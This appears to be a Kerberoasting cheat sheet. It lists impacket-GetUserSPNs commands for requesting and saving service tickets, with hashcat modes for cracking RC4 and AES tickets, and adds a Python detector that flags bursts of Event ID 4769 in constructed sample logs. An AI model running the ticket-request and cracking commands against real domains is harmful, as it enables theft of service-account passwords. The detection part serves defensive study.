Kerberoast
impacket-GetUserSPNs
| Action | Command |
|---|---|
| Request TGS for all roastable SPNs | impacket-GetUserSPNs <domain>/<user>:'<password>' -dc-ip <dc_ip> -request |
| Request TGS for specific user | impacket-GetUserSPNs <domain>/<user>:'<password>' -dc-ip <dc_ip> -request -request-user <svc_user> |
| Save to file (hashcat format) | impacket-GetUserSPNs <domain>/<user>:'<password>' -dc-ip <dc_ip> -request -outputfile kerberoast.hashes |
Crack With Hashcat
- Identify the hash type from the prefix of the captured hash, using the table below

| TGS etype | Hashcat mode | Hash format signature (starts like…) |
|---|---|---|
| RC4-HMAC (etype 23) | 13100 | $krb5tgs$23$*svc_user$REALM.LOCAL$HTTP/web.host.local*${checksum}$<hex…> |
| AES128-CTS-HMAC-SHA1-96 (etype 17) | 19600 | $krb5tgs$17$*svc_user$REALM.LOCAL$HTTP/web.host.local*${checksum}$<hex…> |
| AES256-CTS-HMAC-SHA1-96 (etype 18) | 19700 | $krb5tgs$18$*svc_user$REALM.LOCAL$HTTP/web.host.local*${checksum}$<hex…> |
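
On the defending side, the bulk request in the first table appears on the domain controller as a burst of Event ID 4769 (service ticket requested) records from one account, typically with ticket encryption type 0x17 (the etype 23 row above). The following is an added example, not part of the original page: the event tuples are constructed sample data, and the function name, window and threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data (not real logs). Each tuple carries the Event ID 4769
# fields of interest: time, requesting account, service name, ticket etype, client IP.
# Etype values: 0x17 = RC4-HMAC (23), 0x11 = AES128 (17), 0x12 = AES256 (18).
EVENTS = [
    ("2024-05-01T10:00:01", "jdoe@REALM.LOCAL", "svc_sql", "0x17", "10.0.0.50"),
    ("2024-05-01T10:00:02", "jdoe@REALM.LOCAL", "svc_web", "0x17", "10.0.0.50"),
    ("2024-05-01T10:00:04", "jdoe@REALM.LOCAL", "svc_backup", "0x17", "10.0.0.50"),
    ("2024-05-01T10:00:05", "jdoe@REALM.LOCAL", "WEB01$", "0x12", "10.0.0.50"),
    ("2024-05-01T10:05:00", "alice@REALM.LOCAL", "svc_web", "0x12", "10.0.0.21"),
    ("2024-05-01T09:00:00", "carol@REALM.LOCAL", "svc_sql", "0x17", "10.0.0.33"),
    ("2024-05-01T11:30:00", "carol@REALM.LOCAL", "svc_web", "0x17", "10.0.0.33"),
    ("2024-05-01T12:00:00", "dave@REALM.LOCAL", "svc_sql", "0x12", "10.0.0.60"),
    ("2024-05-01T12:00:01", "dave@REALM.LOCAL", "svc_web", "0x12", "10.0.0.60"),
    ("2024-05-01T12:00:02", "dave@REALM.LOCAL", "svc_backup", "0x12", "10.0.0.60"),
]

def find_kerberoast_bursts(events, window=timedelta(minutes=2), threshold=3, weak_only=True):
    """Return {(user, ip): [services]} for requesters that asked for tickets to
    at least `threshold` distinct user-account services inside `window`."""
    per_requester = defaultdict(list)
    for time, user, service, etype, ip in events:
        # Machine accounts (trailing $) and krbtgt use random keys, so skip them.
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        # AES tickets are still crackable (modes 19600/19700), hence the switch.
        if weak_only and etype != "0x17":
            continue
        per_requester[(user, ip)].append((datetime.fromisoformat(time), service))
    alerts = defaultdict(set)
    for key, reqs in per_requester.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            # Slide the window start forward until it spans at most `window`.
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= threshold:
                alerts[key] |= services
    return {key: sorted(svcs) for key, svcs in alerts.items()}

if __name__ == "__main__":
    for (user, ip), services in find_kerberoast_bursts(EVENTS).items():
        print(f"possible Kerberoasting: {user} from {ip} -> {services}")
```

Setting `weak_only=False` also catches bursts that request AES tickets, at the cost of more noise from legitimate clients.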